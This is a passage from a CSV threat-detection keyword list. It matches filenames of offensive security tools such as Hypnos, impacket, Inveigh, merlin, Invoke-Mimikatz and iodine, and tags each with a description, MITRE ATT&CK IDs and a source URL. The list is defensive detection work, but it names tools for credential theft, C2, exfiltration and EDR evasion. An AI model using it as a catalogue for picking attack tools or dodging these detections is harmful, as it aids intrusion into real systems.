TA0040","N/A","N/A","Defense 
Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\hyperion.exe*",".{0,1000}\\hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\Hypnos.exe*",".{0,1000}\\Hypnos\.exe.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\Hypnos.sln*",".{0,1000}\\Hypnos\.sln.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\Hypnos.vcxproj*",".{0,1000}\\Hypnos\.vcxproj.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\Hypnos-main\*",".{0,1000}\\Hypnos\-main\\.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR 
detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\iat_obfuscation.exe*",".{0,1000}\\iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\icebreaker.py*",".{0,1000}\\icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*\icmp_exfiltration.py*",".{0,1000}\\icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\identify_offencive_tools.log*",".{0,1000}\\identify_offencive_tools\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - 
TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\IDiagnosticProfileUAC*",".{0,1000}\\IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*\iepv.cfg*",".{0,1000}\\iepv\.cfg.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\iepv.exe*",".{0,1000}\\iepv\.exe.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\IEPV.EXE-*.pf*",".{0,1000}\\IEPV\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\iepv.zip.lnk*",".{0,1000}\\iepv\.zip\.lnk.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential 
Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\iis_controller.py*",".{0,1000}\\iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*\impacket.*",".{0,1000}\\impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\impacket.zip*",".{0,1000}\\impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\impacket-out\*",".{0,1000}\\impacket\-out\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\Impersonate.exe*",".{0,1000}\\Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - 
TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Impersonate\Impersonate.cpp*",".{0,1000}\\Impersonate\\Impersonate\.cpp.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*\Implant.exe *",".{0,1000}\\Implant\.exe\s.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*\implant.exe *.exe",".{0,1000}\\implant\.exe\s.{0,1000}\.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\Implants\powershell.ps1*",".{0,1000}\\Implants\\powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*\ImplantSSP.exe*",".{0,1000}\\ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\InactiveDomainAdmins.csv*",".{0,1000}\\InactiveDomainAdmins\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*\inceptor.py*",".{0,1000}\\inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*\include\KaynStrike.h*",".{0,1000}\\include\\KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the 
thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\include\kerberoast.h*",".{0,1000}\\include\\kerberoast\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\InflativeLoading.py*",".{0,1000}\\InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\InflativeLoading\bin\*.bin*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\InflativeLoading\bin\*.exe*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" 
"*\InflativeLoading-main.zip*",".{0,1000}\\InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\InfoGrab.dll*",".{0,1000}\\InfoGrab\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\inject_shellcode.py*",".{0,1000}\\inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\injector.ps1 1 *",".{0,1000}\\injector\.ps1\s1\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\injector.ps1 2 *",".{0,1000}\\injector\.ps1\s2\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - 
TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\inline-shellcode-test.c*",".{0,1000}\\inline\-shellcode\-test\.c.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\install_elevated.py*",".{0,1000}\\install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\interesting-teamsmessages.csv*",".{0,1000}\\interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\inveigh.exe*",".{0,1000}\\inveigh\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Inveigh\bin\*",".{0,1000}\\Inveigh\\bin\\.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*\InventoryApplicationFile\revsocks_windows*",".{0,1000}\\InventoryApplicationFile\\revsocks_windows.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 
implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\Invoke-ADSBackdoor.ps1*",".{0,1000}\\Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Bypass.ps1*",".{0,1000}\\Invoke\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Invoke-DCOM.ps1*",".{0,1000}\\Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\\Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote 
Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Dump.ps1*",".{0,1000}\\Invoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Invoke-ExcelMacroPivot.ps1*",".{0,1000}\\Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-InternalMonologue.ps1*",".{0,1000}\\Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Mimikatz.ps1*",".{0,1000}\\Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a 
post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-mimikittenz.ps1*",".{0,1000}\\Invoke\-mimikittenz\.ps1.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\Invoke-PowerThIEf.ps1*",".{0,1000}\\Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Stealth.ps1*",".{0,1000}\\Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\InvokeWebRequestCommand.cs",".{0,1000}\\InvokeWebRequestCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Invoke-WMILM.ps1*",".{0,1000}\\Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\InvokeWmiMethodCommand.cs",".{0,1000}\\InvokeWmiMethodCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\iodine-*-windows.zip*",".{0,1000}\\iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*\iodine.exe*",".{0,1000}\\iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*\iodine-master\*",".{0,1000}\\iodine\-master\\.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*\IOXIDResolver.py*",".{0,1000}\\IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 